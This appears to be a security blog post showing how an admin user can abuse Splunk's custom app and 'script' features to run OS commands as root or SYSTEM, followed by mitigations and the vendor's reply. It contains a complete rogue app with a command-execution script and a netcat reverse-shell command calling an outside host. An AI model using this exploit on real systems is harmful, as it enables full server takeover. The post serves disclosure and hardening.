Splunk background

Splunk is a fantastically powerful solution to "search, monitor and analyse machine-generated data by applications, systems and IT infrastructure" and it's no surprise that many businesses are turning to it to help meet some of their compliance objectives. Part of Splunk's power comes from its query language and custom application capability. If a user wants to extend Splunk, for example to parse and group disparate log entries into a transactional view, they can. On top of this, a healthy marketplace for Splunk Apps has grown up on the SplunkBase community website.

Splunk Applications

A Splunk App is a collection of scripts, content and configuration files in a defined directory structure, which is uploaded to the Splunk server and added to the App list. This gives authorised users access to the queries and actions the App can perform. To upload an App through the web interface, the Splunk user requires the 'admin' role (by default).

A bit more power than you bargained for?

Splunk offer a very powerful command called script, which allows admin-level Splunk users to make "calls to external Perl or Python programs". This is very useful for a number of reasons, but is particularly interesting to an attacker who has gained administrative access to a Splunk server.

Nothing new here really. Lots of apps allow authenticated users to upload custom content and every one of them is potentially vulnerable if they do not adequately ensure that this cannot be abused. The main difference with Splunk is two-fold in my opinion.

Firstly, by default Splunk runs as root (on Unix, LocalSystem on Windows). This is far better from an attacker's perspective than, for example, the web server user.

Secondly, in the free version of Splunk there is no authentication at all; it logs you straight in as admin. The Enterprise version does provide authentication and granular permission control. However, as disclosed by Sec-1 in November 2012, it does not protect the login page against brute-force attacks, which leaves it vulnerable. I verified this against the recently released version 5 with a simple Burp Intruder attack: password attempt 100 succeeded.

SplunkWeb runs over HTTP, not HTTPS, by default, though HTTPS is a simple click away (more on that later). This means there is also a risk of credentials being captured on the network by a suitably placed Man-In-The-Middle.

Summarising quickly, what we have here is a "feature", not a vulnerability. However, as you will see, Splunk has powerful functionality which can be abused with significant security implications.

Splunk, out of the box:

1) Allows the definition of custom applications

2) Custom applications can execute arbitrary Python or Perl scripts

3) Runs as root (or SYSTEM) by default

What could possibly go wrong? We're about to find out.

Building a "rogue" Splunk App

Splunk Apps can be very complicated affairs with the possibility of hooking into the SplunkWeb MVC framework to define custom controllers and views for rendering your data. Our needs are actually very modest so we will create the minimum required for our goal: arbitrary OS command execution.

Splunk Apps are installed to $SPLUNK_HOME/etc/apps on the Splunk server. Each app has its own directory, usually named after the app. There are three ways to get an App onto a Splunk server:

1) Manually copy to $SPLUNK_HOME/etc/apps

2) Install from SplunkBase through the SplunkWeb UI

3) Define or upload through the SplunkWeb UI

Option 1 is obviously not available to us at this stage; if we already had this kind of access and privilege on the server, we likely wouldn't need this attack.

Option 2 is an interesting potential attack vector which I plan to explore in the future. I do not know what checks are made by Splunk when you submit an app to SplunkBase. As with the smartphone app stores, there is a great risk in installing arbitrary code into your environment, particularly since, as we demonstrate in this post, it runs with such privilege by default.

The Splunk Developer Agreement certainly seems aware of what's possible. It states:

(d) Your Application will not contain any malware, virus, worm, Trojan horse, adware, spyware, malicious code or any software routines or components that permit unauthorized access, to disable or erase software, hardware or data, or to perform any other such actions that will have the effect of materially impeding the normal and expected operation of Your Application.

A topic for another day perhaps.

So, Option 3 it is then. You can manually define the files through the UI but that's slow. The easiest way is to create the folder structure and files locally, then produce a tar.gz archive from it and upload.

We will create an app called upload_app_exec. It will contain the following:

upload_app_exec

upload_app_exec/bin

upload_app_exec/bin/pwn.py

upload_app_exec/default

upload_app_exec/default/app.conf

upload_app_exec/default/commands.conf

upload_app_exec/metadata

upload_app_exec/metadata/default.meta

app.conf - defines information about the app, including its version number and visibility in the UI. This is important for our attack later.

[launcher]

author=Marc Wickenden

description=With great power....

version=1.3.3.7

[ui]

is_visible = true

commands.conf - defines the name of our command to pass to "script" in Splunk. This ties our arbitrary Python or Perl to the Splunk UI.

[pwn]

type = python

filename = pwn.py

local = false

enableheader = false

streaming = false

perf_warn_limit = 0

default.meta - for our purposes, this defines the scope of our commands. We export to "system", which basically means all apps.


[commands]

export = system

pwn.py - the meat and potatoes. This is the arbitrary Python script which Splunk will run. It could be even simpler than what I have defined here; however, by using the splunk.Intersplunk Python library provided, we are able to capture output from the commands executed and present it back to Splunk cleanly.

We pass in a single argument, a base64-encoded string. This is easier as it avoids browser encoding issues and having to handle multiple arguments, either here or in Splunk.

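import base64

import os

import sys

import splunk.Intersplunk

results = []

try:

    # Decode the single base64 argument and run it with the Splunk process's privileges (root/SYSTEM by default)

    os.system(base64.b64decode(sys.argv[1]))

except Exception:

    # On any failure, hand the traceback back to Splunk as an error result

    import traceback

    stack = traceback.format_exc()

    results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))

# Return the (possibly empty) results to the Splunk search pipeline

splunk.Intersplunk.outputResults(results)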

With everything in place, we simply tar and gzip the directory, ready for upload.

$ tar cvzf upload_app_exec.tgz upload_app_exec

a upload_app_exec

a upload_app_exec/bin

a upload_app_exec/default

a upload_app_exec/metadata

a upload_app_exec/metadata/default.meta

a upload_app_exec/default/app.conf

a upload_app_exec/default/commands.conf

a upload_app_exec/bin/pwn.py
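If you'd rather script the packaging step, Python's standard tarfile module produces the same layout as the tar command above. A minimal sketch, assuming the upload_app_exec directory already exists locally; package_app is a hypothetical helper, and clearing the owner fields is an optional choice so the archive doesn't carry your local username:

```python
import pathlib
import tarfile


def _normalise(info: tarfile.TarInfo) -> tarfile.TarInfo:
    # Optional: don't leak the local username/uid into the archive.
    info.uid = info.gid = 0
    info.uname = info.gname = ""
    return info


def package_app(app_dir, out_path):
    """Create a .tgz whose top-level entry is the app directory, equivalent
    to `tar cvzf upload_app_exec.tgz upload_app_exec`."""
    app_dir = pathlib.Path(app_dir)
    with tarfile.open(out_path, "w:gz") as tar:
        # tar.add recurses into sub-directories by default.
        tar.add(app_dir, arcname=app_dir.name, filter=_normalise)
    # Return the member names so the caller can sanity-check the layout.
    with tarfile.open(out_path, "r:gz") as tar:
        return tar.getnames()
```

For example, package_app("upload_app_exec", "upload_app_exec.tgz") should return a list starting with upload_app_exec and including upload_app_exec/bin/pwn.py, matching the tar output above.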

Now we head over to our Splunk system to complete the upload. I will demonstrate this with a default installation of the latest version of Splunk at the time of writing (version 5) on a Debian 6 box. The only thing I have configured in Splunk is the Free License, activated in place of the trial Enterprise license included by default.

For completeness I simply ran:

dpkg -i splunk-5.0-140868-linux-2.6-intel.deb

/opt/splunk/bin/splunk start

Uploading the App

Open your browser and enter the address of your target Splunk instance. In this example my Debian box is splunk-linux.local on the default port of 8000. By default you will be greeted by the launcher app.

Click on the Apps menu on the right-hand side.

Then "Install app from file" and select the tar.gz we created in the previous steps.



You should receive a message to say the app installed successfully. Now access it from the App dropdown menu at the top right of the screen.

You will be presented with the timeline interface for our new app.

Exploitation

If you recall from earlier, our command will be supplied as a base64 encoded string. For this demonstration I will pop a reverse netcat shell to my waiting listener. Generating base64 is a doddle but just in case you want some command-line fu:

OS X/Linux:

$ echo -n 'nc -e /bin/sh 172.16.125.1 4444' | base64

bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Windows Powershell:

PS> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('nc -e /bin/sh 172.16.125.1 4444'))

bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==
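Python works just as well if it's what you have to hand. A minimal sketch using only the standard library base64 module; encode_command and decode_command are hypothetical helper names, and decode_command mirrors what pwn.py does with sys.argv[1]:

```python
import base64


def encode_command(command: str) -> str:
    """Base64-encode a command string for use as the single argument to
    the `script pwn` search command."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Reverse of encode_command, mirroring base64.b64decode in pwn.py."""
    return base64.b64decode(encoded).decode("utf-8")


if __name__ == "__main__":
    encoded = encode_command("systeminfo")
    print(encoded)  # c3lzdGVtaW5mbw==
    assert decode_command(encoded) == "systeminfo"
```

The encoded string then goes into the search exactly as before, for example * | script pwn c3lzdGVtaW5mbw== for the systeminfo command used later in this post.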

Now set up a listener for our netcat reverse shell on port 4444 with:

$ nc -vln 4444

Finally, time to trigger the command execution and get our shell. In the Splunk search box type the command to pipe the search results (which are irrelevant to us) to our script command:

* | script pwn bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Profit:

We can also return the output of a command to Splunk for display in the browser. This time I will demonstrate using Splunk for Windows, just to show it's a universal problem. Again this is a default installation of version 5, this time on Windows Server 2008 R2 and with an Enterprise license.

Upload the same app as before but this time we will issue the systeminfo command which will run as NT AUTHORITY\SYSTEM.

Automation

The process itself is very simple, but wouldn't it be even better if some kind soul had developed this functionality for the Metasploit Framework? It's your lucky day: head on over to the second blog post in this series for all the details:

Splunk Functionality Abuse with Metasploit.

Fixing it

Splunk have been contacted for advice on this threat but have so far not responded. We will update this blog with their official response as and when we receive it.

UPDATE: 15th November 2012

Fred Wilmot at Splunk has been in touch with me and we've had a really good chat about this. He sent me an email addressing each of the points in this post. What is also clear is that Splunk are committed to doing things the "right way". Fred has some great ideas he's working on so hopefully these will come to fruition. I have included Splunk's response at the end.

In the meantime, we would suggest that, at a minimum, Splunk administrators implement the advice in Splunk's hardening guide at http://wiki.splunk.com/Community:DeployHardenedSplunk. This will result in an installation which does not run as a privileged user and which switches SplunkWeb to HTTPS. These measures don't directly address the threat of arbitrary command execution, however. Depending on the target of the attack and other implementation details, getting access to a "splunk" user may be enough. Think "data oriented" or "goal oriented" rather than assuming root is required.

I have not been able to identify a way to disable the script command. The main splunkd process is a compiled executable, but a lot of Splunk's functionality is written in Python, so there may be a simple way to comment out or redefine the pertinent parts of the application. This would, however, be a hard sell to most organisations, and rightly so, particularly Enterprise customers who pay handsomely for their annual support contracts.

I wonder also if Linux/Unix users could chroot the installation without losing functionality. This may be the strongest mitigation available.

For now, the best advice we can give seems to be: ensure that no Free Licence deployments of Splunk are available on a network which contains sensitive data; ensure that credentials are not shared at an OS level between Enterprise deployments and Free versions, particularly for accounts with the admin role; and review users with the admin role regularly, reducing their privileges to the least required. All the usual good advice, basically.
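One practical piece of that review is knowing which installed apps define custom script commands and how widely they are exported, since that is exactly what our rogue app relies on. A minimal Python sketch, assuming the on-disk layout used earlier in this post ($SPLUNK_HOME/etc/apps/<app>/default/commands.conf and metadata/default.meta) and a simplified reading of Splunk's .conf syntax. parse_conf and audit_apps are hypothetical helpers rather than Splunk APIs, and the sketch ignores local/ overrides and local.meta:

```python
import pathlib


def parse_conf(text):
    """Very small reader for Splunk-style .conf text, returning
    {stanza: {key: value}}. Assumptions: settings before any stanza belong
    to "default"; '#' starts a comment line; backslash continuations and
    other advanced syntax are NOT handled."""
    stanzas = {"default": {}}
    current = stanzas["default"]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            # "[]" (the app-wide stanza in .meta files) becomes the key "".
            current = stanzas.setdefault(line[1:-1].strip(), {})
        elif "=" in line:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip()
    return stanzas


def audit_apps(apps_dir):
    """List custom search commands defined in each app's
    default/commands.conf, with the export scope from metadata/default.meta."""
    findings = []
    for app in sorted(p for p in pathlib.Path(apps_dir).iterdir() if p.is_dir()):
        commands_conf = app / "default" / "commands.conf"
        if not commands_conf.is_file():
            continue
        commands = parse_conf(commands_conf.read_text(encoding="utf-8"))
        meta_file = app / "metadata" / "default.meta"
        meta = parse_conf(meta_file.read_text(encoding="utf-8")) if meta_file.is_file() else {}
        # Assumed precedence: a [commands] stanza beats the app-wide [] one;
        # with neither, treat the commands as app-local ("none").
        export = (meta.get("commands", {}).get("export")
                  or meta.get("", {}).get("export")
                  or "none")
        for name, settings in commands.items():
            if name == "default" or "filename" not in settings:
                continue
            findings.append({
                "app": app.name,
                "command": name,
                "type": settings.get("type", "unknown"),
                # Assumes the script lives in the app's bin/ directory.
                "script": str(app / "bin" / settings["filename"]),
                "export": export,
            })
    return findings
```

Run against /opt/splunk/etc/apps on the Debian box from earlier, it should report the pwn command from upload_app_exec with an export of system. It is an inventory aid only; it does not stop an admin-level user from uploading a new app.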

If Splunk come back to us with any further advice we will update this post accordingly. I'm particularly interested in the answer to another question I asked them: which other commands or functionality can be (ab)used in this way. If you think of any please add a comment.

END OF ORIGINAL POST

Response from Fred Wilmot at Splunk:

We wanted to respond to your blog post, all three sections of which I enjoyed reading. You express some valid concerns if best practices are not followed. Let me try to summarize:

Threat Model:

1) Default Splunk runs as root (on Unix, LocalSystem on Windows).

2) No authentication mechanism other than Splunk, default login is administrative

3) Lack of HTTPS by default leaves Splunk credentials susceptible to MitM.

4) Potential for data oriented compromise using another Splunk user account.

* create roles and map capability to user based on least privilege (which is default 0 for new accounts)

Summarising quickly, what we have here is a "feature" not a vulnerability however, as you will see, Splunk has powerful functionality which can be abused with significant security implications.

Exploitation:

We certainly are aware of the power of the features of Splunk, and if standard security best practices are bypassed like: privileged local account access, running Splunk as root, and using the free version of Splunk w/o an auth scheme, you have the opportunity to execute scripts using Splunk and python libs for code execution.

We designed Splunk to allow roles to add applications both through the User Interface as well as the file system through access. We also completely agree that the free version's method of authentication is NOT designed for enterprise use, and suggest the primary use case is enabling folks to get used to core Splunk with a volume of daily ingest license as the limiter. Anyone with the ability to run root, owns the box, and hence, all things. If we install an app under that context, the same functionality applies.

Mitigation:

Here are some ways/means to add some controls around feature function-

1) If authenticating to Splunk, use SSL as a standard function when possible, in conjunction with LDAP authentication. Generate your own keys, don't use Splunk's default keys as well.

2) Provided we follow a roles-based access control approach, we can also limit who is capable of authenticating as a role to Splunk, and thereby what they can do as a function of product features. this includes searches, views, applications, and many of the administrative functions for running Splunk.

3) We can configure commands.conf to prevent script export to anything outside the application it runs in, including passing authentication as a function of the custom python script.

4) We can also configure default.meta to add additional controls around the application itself. *.meta files contain ownership information, access controls, and export settings for Splunk objects like saved searches, event types, and views. Each app has its own default.meta file.

5) We can also limit Splunk 'Restrict Search Terms' and capabilities specifically. This can include search parameters aside from script.

6) Do not run Splunk as root. This is documented for our customers, and a recommended best practice.

7) Do not use the default 'Admin' role for normal usage; create both roles and users in Splunk to assign controls to authorized users. We suggest tying in an authentication mechanism such as LDAP or AD.

8) Do not use Splunk authentication as a method for access control in production.

9) MitM credential attacks happen when not using SSL, and brute forcing happens without strong authentication. Configure Splunk to use SSL and LDAP to mitigate these risks.


From our community wiki, as you followed, we also include some hardening practices.

As a vendor committed to product security, we also publish our responsible disclosure practices, best practices and guidance here.

Suggestions:

I do see an opportunity to limit the capability of script execution as an additional control we can place in the roles capability to limit arbitrary code execution by anyone at the Splunk Application level. Maybe we limit script loading except through the UI for all non 'Admin' roles? Perhaps assigning a GUID to a script specifically might add granularity here as well. We also have a functionality to monitor and audit user interactivity within Splunk. We, of course, Splunk that too.

You asked about some operations that may have interesting impacts as you describe with 'script' command, I might suggest the nature of the feature itself allows for this, and should be used with due care, change control, and audit for visibility into add/change/mod. We designed Splunk to allow folks to upload/download apps to Splunk as a platform from our splunk-base.splunk.com, as well as the community to contribute their context for Splunk as a platform with their applications they have created.

As you said, with great power comes great responsibility; we are very open to suggestions, and feedback on the product. Thank you very much for both the candor and the feedback, looking forward to hearing more from you.

Best regards,

Fred

Fred Wilmot, CISSP

Security Practice Manager